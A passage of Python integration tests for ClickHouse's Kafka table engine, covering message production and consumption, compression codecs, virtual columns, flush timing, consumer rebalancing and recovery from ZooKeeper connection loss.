kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('mv', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_librdkafka_compression(kafka_cluster):
"""
Regression for UB in snappy-c (that is used in librdkafka),
backport pr is [1].
[1]: https://github.com/ClickHouse-Extras/librdkafka/pull/3
Example of corruption:
2020.12.10 09:59:56.831507 [ 20 ] {} <Error> void DB::StorageKafka::threadFunc(size_t): Code: 27, e.displayText() = DB::Exception: Cannot parse input: expected '"' before: 'foo"}': (while reading the value of key value): (at row 1)
To trigger this regression there should duplicated messages
Orignal reproducer is:
$ gcc --version |& fgrep gcc
gcc (GCC) 10.2.0
$ yes foobarbaz | fold -w 80 | head -n10 >| in-…
$ make clean && make CFLAGS='-Wall -g -O2 -ftree-loop-vectorize -DNDEBUG=1 -DSG=1 -fPIC'
$ ./verify in
final comparision of in failed at 20 of 100
"""
supported_compression_types = ['gzip', 'snappy', 'lz4', 'zstd', 'uncompressed']
messages = []
expected = []
value = 'foobarbaz'*10
number_of_messages = 50
for i in range(number_of_messages):
messages.append(json.dumps({'key': i, 'value': value}))
expected.append(f'{i}\t{value}')
expected = '\n'.join(expected)
for compression_type in supported_compression_types:
print(('Check compression {}'.format(compression_type)))
topic_name = 'test_librdkafka_compression_{}'.format(compression_type)
admin_client = admin.AdminClient({'bootstrap.servers': 'localhost:9092'})
topic = admin.NewTopic(topic=topic_name, num_partitions=1, replication_factor=1, config={
'compression.type': compression_type,
})
admin_client.create_topics(new_topics=[topic], validate_only=False)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = 'JSONEachRow',
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.consumer Engine=Log AS
SELECT * FROM test.kafka;
'''.format(topic_name=topic_name) )
kafka_produce(topic_name, messages)
instance.wait_for_log_line("Committed offset {}".format(number_of_messages))
result = instance.query('SELECT * FROM test.consumer')
assert TSV(result) == TSV(expected)
instance.query('DROP TABLE test.kafka SYNC')
instance.query('DROP TABLE test.consumer SYNC')
@pytest.mark.timeout(180)
def test_kafka_materialized_view_with_subquery(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mvsq',
kafka_group_name = 'mvsq',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM (SELECT * FROM test.kafka);
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('mvsq', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_many_materialized_views(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view1;
DROP TABLE IF EXISTS test.view2;
DROP TABLE IF EXISTS test.consumer1;
DROP TABLE IF EXISTS test.consumer2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mmv',
kafka_group_name = 'mmv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view1 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
SELECT * FROM test.kafka;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('mmv', messages)
while True:
result1 = instance.query('SELECT * FROM test.view1')
result2 = instance.query('SELECT * FROM test.view2')
if kafka_check_result(result1) and kafka_check_result(result2):
break
instance.query('''
DROP TABLE test.consumer1;
DROP TABLE test.consumer2;
DROP TABLE test.view1;
DROP TABLE test.view2;
''')
kafka_check_result(result1, True)
kafka_check_result(result2, True)
@pytest.mark.timeout(300)
def test_kafka_flush_on_big_message(kafka_cluster):
# Create batchs of messages of size ~100Kb
kafka_messages = 1000
batch_messages = 1000
messages = [json.dumps({'key': i, 'value': 'x' * 100}) * batch_messages for i in range(kafka_messages)]
kafka_produce('flush', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush',
kafka_group_name = 'flush',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
client = KafkaAdminClient(bootstrap_servers="localhost:9092")
received = False
while not received:
try:
offsets = client.list_consumer_group_offsets('flush')
for topic, offset in list(offsets.items()):
if topic.topic == 'flush' and offset.offset == kafka_messages:
received = True
break
except kafka.errors.GroupCoordinatorNotAvailableError:
continue
while True:
result = instance.query('SELECT count() FROM test.view')
if int(result) == kafka_messages * batch_messages:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert int(result) == kafka_messages * batch_messages, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(180)
def test_kafka_virtual_columns(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt1',
kafka_group_name = 'virt1',
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('virt1', [messages], 0)
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('virt1', [messages], 0)
result = ''
while True:
result += instance.query(
'''SELECT _key, key, _topic, value, _offset, _partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) AS _timestamp FROM test.kafka''',
ignore_error=True)
if kafka_check_result(result, False, 'test_kafka_virtual1.reference'):
break
kafka_check_result(result, True, 'test_kafka_virtual1.reference')
@pytest.mark.timeout(180)
def test_kafka_virtual_columns_with_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2',
kafka_group_name = 'virt2',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64, kafka_key String, topic String, offset UInt64, partition UInt64, timestamp Nullable(DateTime('UTC')))
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _key as kafka_key, _topic as topic, _offset as offset, _partition as partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) as timestamp FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('virt2', messages, 0)
while True:
result = instance.query('SELECT kafka_key, key, topic, value, offset, partition, timestamp FROM test.view')
if kafka_check_result(result, False, 'test_kafka_virtual2.reference'):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True, 'test_kafka_virtual2.reference')
@pytest.mark.timeout(180)
def test_kafka_insert(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert1',
kafka_group_name = 'insert1',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
messages = []
while True:
messages.extend(kafka_consume('insert1'))
if len(messages) == 50:
break
result = '\n'.join(messages)
kafka_check_result(result, True)
@pytest.mark.timeout(240)
def test_kafka_produce_consume(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert2',
kafka_group_name = 'insert2',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages_num = 10000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 16
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(300)
def test_kafka_commit_on_block_write(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
cancel = threading.Event()
i = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(101):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce('block', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
while int(instance.query('SELECT count() FROM test.view')) == 0:
time.sleep(1)
cancel.set()
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
''')
while int(instance.query('SELECT uniqExact(key) FROM test.view')) < i[0]:
time.sleep(1)
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.view'))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
@pytest.mark.timeout(180)
def test_kafka_virtual_columns2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="virt2_0", num_partitions=2, replication_factor=1))
topic_list.append(NewTopic(name="virt2_1", num_partitions=2, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
CREATE TABLE test.kafka (value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2_0,virt2_1',
kafka_group_name = 'virt2',
kafka_num_consumers = 2,
kafka_format = 'JSONEachRow';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT value, _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp), toUnixTimestamp64Milli(_timestamp_ms), _headers.name, _headers.value FROM test.kafka;
''')
producer = KafkaProducer(bootstrap_servers="localhost:9092", value_serializer=producer_serializer, key_serializer=producer_serializer)
producer.send(topic='virt2_0', value=json.dumps({'value': 1}), partition=0, key='k1', timestamp_ms=1577836801001,
headers=[('content-encoding', b'base64')])
producer.send(topic='virt2_0', value=json.dumps({'value': 2}), partition=0, key='k2', timestamp_ms=1577836802002,
headers=[('empty_value', b''), ('', b'empty name'), ('', b''), ('repetition', b'1'), ('repetition', b'2')])
producer.flush()
time.sleep(1)
producer.send(topic='virt2_0', value=json.dumps({'value': 3}), partition=1, key='k3', timestamp_ms=1577836803003,
headers=[('b', b'b'), ('a', b'a')])
producer.send(topic='virt2_0', value=json.dumps({'value': 4}), partition=1, key='k4', timestamp_ms=1577836804004,
headers=[('a', b'a'), ('b', b'b')])
producer.flush()
time.sleep(1)
producer.send(topic='virt2_1', value=json.dumps({'value': 5}), partition=0, key='k5', timestamp_ms=1577836805005)
producer.send(topic='virt2_1', value=json.dumps({'value': 6}), partition=0, key='k6', timestamp_ms=1577836806006)
producer.flush()
time.sleep(1)
producer.send(topic='virt2_1', value=json.dumps({'value': 7}), partition=1, key='k7', timestamp_ms=1577836807007)
producer.send(topic='virt2_1', value=json.dumps({'value': 8}), partition=1, key='k8', timestamp_ms=1577836808008)
producer.flush()
time.sleep(10)
members = describe_consumer_group('virt2')
# pprint.pprint(members)
members[0]['client_id'] = 'ClickHouse-instance-test-kafka-0'
members[1]['client_id'] = 'ClickHouse-instance-test-kafka-1'
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
expected = '''\
1 k1 virt2_0 0 0 1577836801 1577836801001 ['content-encoding'] ['base64']
2 k2 virt2_0 0 1 1577836802 1577836802002 ['empty_value','','','repetition','repetition'] ['','empty name','','1','2']
3 k3 virt2_0 1 0 1577836803 1577836803003 ['b','a'] ['b','a']
4 k4 virt2_0 1 1 1577836804 1577836804004 ['a','b'] ['a','b']
5 k5 virt2_1 0 0 1577836805 1577836805005 [] []
6 k6 virt2_1 0 1 1577836806 1577836806006 [] []
7 k7 virt2_1 1 0 1577836807 1577836807007 [] []
8 k8 virt2_1 1 1 1577836808 1577836808008 [] []
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(120)
def test_kafka_produce_key_timestamp(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="insert3", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka_writer (key UInt64, value UInt64, _key String, _timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.kafka (key UInt64, value UInt64, inserted_key String, inserted_timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT key, value, inserted_key, toUnixTimestamp(inserted_timestamp), _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp) FROM test.kafka;
''')
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(1, 1, 'k1', 1577836801))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(2, 2, 'k2', 1577836802))
instance.query(
"INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({})),({},{},'{}',toDateTime({}))".format(3, 3,
'k3',
1577836803,
4, 4,
'k4',
1577836804))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(5, 5, 'k5', 1577836805))
while int(instance.query("SELECT count() FROM test.view")) < 5:
time.sleep(1)
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
# print(result)
expected = '''\
1 1 k1 1577836801 k1 insert3 0 0 1577836801
2 2 k2 1577836802 k2 insert3 0 1 1577836802
3 3 k3 1577836803 k3 insert3 0 2 1577836803
4 4 k4 1577836804 k4 insert3 0 3 1577836804
5 5 k5 1577836805 k5 insert3 0 4 1577836805
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(600)
def test_kafka_flush_by_time(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="flush_by_time", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_time',
kafka_group_name = 'flush_by_time',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
SELECT * FROM test.kafka;
CREATE TABLE test.view (key UInt64, value UInt64, ts DateTime64(3) MATERIALIZED now64(3))
ENGINE = MergeTree()
ORDER BY key;
''')
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce('flush_by_time', messages)
time.sleep(0.8)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
time.sleep(18)
result = instance.query('SELECT uniqExact(ts) = 2, count() >= 15 FROM test.view')
cancel.set()
kafka_thread.join()
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('1 1')
@pytest.mark.timeout(90)
def test_kafka_flush_by_block_size(kafka_cluster):
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce('flush_by_block_size', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_block_size',
kafka_group_name = 'flush_by_block_size',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_flush_interval_ms = 120000, /* should not flush by time during test */
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
# Wait for Kafka engine to consume this data
while 1 != int(instance.query(
"SELECT count() FROM system.parts WHERE database = 'test' AND table = 'view' AND name = 'all_1_1_0'")):
time.sleep(0.5)
cancel.set()
kafka_thread.join()
# more flushes can happens during test, we need to check only result of first flush (part named all_1_1_0).
result = instance.query("SELECT count() FROM test.view WHERE _part='all_1_1_0'")
# print(result)
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# 100 = first poll should return 100 messages (and rows)
# not waiting for stream_flush_interval_ms
assert int(
result) == 100, 'Messages from kafka should be flushed when block of size kafka_max_block_size is formed!'
@pytest.mark.timeout(600)
def test_kafka_lot_of_partitions_partial_commit_of_bulk(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions2", num_partitions=10, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions2',
kafka_group_name = 'topic_with_multiple_partitions2',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 211,
kafka_flush_interval_ms = 500;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
count = 0
for dummy_msg in range(1000):
rows = []
for dummy_row in range(random.randrange(3, 10)):
count = count + 1
rows.append(json.dumps({'key': count, 'value': count}))
messages.append("\n".join(rows))
kafka_produce('topic_with_multiple_partitions2', messages)
instance.wait_for_log_line('kafka.*Stalled', repetitions=5)
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
print(result)
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(count))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
@pytest.mark.timeout(1200)
def test_kafka_rebalance(kafka_cluster):
NUMBER_OF_CONSURRENT_CONSUMERS = 11
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# kafka_cluster.open_bash_shell('instance')
# time.sleep(2)
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions", num_partitions=11, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
cancel = threading.Event()
msg_index = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(59):
messages.append(json.dumps({'key': msg_index[0], 'value': msg_index[0]}))
msg_index[0] += 1
kafka_produce('topic_with_multiple_partitions', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS):
table_name = 'kafka_consumer{}'.format(consumer_index)
print(("Setting up {}".format(table_name)))
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
CREATE TABLE test.{0} (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions',
kafka_group_name = 'rebalance_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 33,
kafka_flush_interval_ms = 500;
CREATE MATERIALIZED VIEW test.{0}_mv TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp,
'{0}' as _consumed_by
FROM test.{0};
'''.format(table_name))
# kafka_cluster.open_bash_shell('instance')
# Waiting for test.kafka_consumerX to start consume ...
instance.wait_for_log_line('kafka_consumer{}.*Polled offset [0-9]+'.format(consumer_index))
cancel.set()
# I leave last one working by intent (to finish consuming after all rebalances)
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS - 1):
print(("Dropping test.kafka_consumer{}".format(consumer_index)))
instance.query('DROP TABLE IF EXISTS test.kafka_consumer{} SYNC'.format(consumer_index))
# print(instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination'))
# kafka_cluster.open_bash_shell('instance')
while 1:
messages_consumed = int(instance.query('SELECT uniqExact(key) FROM test.destination'))
if messages_consumed >= msg_index[0]:
break
time.sleep(1)
print(("Waiting for finishing consuming (have {}, should be {})".format(messages_consumed, msg_index[0])))
print((instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination')))
# Some queries to debug...
# SELECT * FROM test.destination where key in (SELECT key FROM test.destination group by key having count() <> 1)
# select number + 1 as key from numbers(4141) x left join test.destination using (key) where test.destination.key = 0;
# SELECT * FROM test.destination WHERE key between 2360 and 2370 order by key;
# select _partition from test.destination group by _partition having count() <> max(_offset) + 1;
# select toUInt64(0) as _partition, number + 1 as _offset from numbers(400) x left join test.destination using (_partition,_offset) where test.destination.key = 0 order by _offset;
# SELECT * FROM test.destination WHERE _partition = 0 and _offset between 220 and 240 order by _offset;
# CREATE TABLE test.reference (key UInt64, value UInt64) ENGINE = Kafka SETTINGS kafka_broker_list = 'kafka1:19092',
# kafka_topic_list = 'topic_with_multiple_partitions',
# kafka_group_name = 'rebalance_test_group_reference',
# kafka_format = 'JSONEachRow',
# kafka_max_block_size = 100000;
#
# CREATE MATERIALIZED VIEW test.reference_mv Engine=Log AS
# SELECT key, value, _topic,_key,_offset, _partition, _timestamp, 'reference' as _consumed_by
# FROM test.reference;
#
# select * from test.reference_mv left join test.destination using (key,_topic,_offset,_partition) where test.destination._consumed_by = '';
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.destination'))
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS):
print(("kafka_consumer{}".format(consumer_index)))
table_name = 'kafka_consumer{}'.format(consumer_index)
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
'''.format(table_name))
instance.query('''
DROP TABLE IF EXISTS test.destination;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
@pytest.mark.timeout(120)
def test_kafka_no_holes_when_write_suffix_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce('no_holes_when_write_suffix_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'no_holes_when_write_suffix_failed',
kafka_group_name = 'no_holes_when_write_suffix_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 2000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = ReplicatedMergeTree('/clickhouse/kafkatest/tables/no_holes_when_write_suffix_failed', 'node1')
ORDER BY key;
''')
# init PartitionManager (it starts container) earlier
pm = PartitionManager()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
instance.wait_for_log_line("Polled batch of 20 messages")
# the tricky part here is that disconnect should happen after write prefix, but before write suffix
# we have 0.25 (sleepEachRow) * 20 ( Rows ) = 5 sec window after "Polled batch of 20 messages"
# while materialized view is working to inject zookeeper failure
pm.drop_instance_zk_connections(instance)
instance.wait_for_log_line("Error.*(session has been expired|Connection loss).*while write prefix to view")
pm.heal_all()
instance.wait_for_log_line("Committed offset 22")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
print(result)
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('22\t22\t22')
@pytest.mark.timeout(120)
def test_exception_from_destructor(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query_and_get_error('''
SELECT * FROM test.kafka;
''')
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query('''
DROP TABLE test.kafka;
''')
# kafka_cluster.open_bash_shell('instance')
assert TSV(instance.query('SELECT 1')) == TSV('1')
@pytest.mark.timeout(120)
def test_commits_of_unprocessed_messages_on_drop(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce('commits_of_unprocessed_messages_on_drop', messages)
instance.query('''
DROP TABLE IF EXISTS test.destination SYNC;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
# Waiting for test.kafka_consumer to start consume
instance.wait_for_log_line('Committed offset [0-9]+')
cancel = threading.Event()
i = [2]
def produce():
while not cancel.is_set():
messages = []
for _ in range(113):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
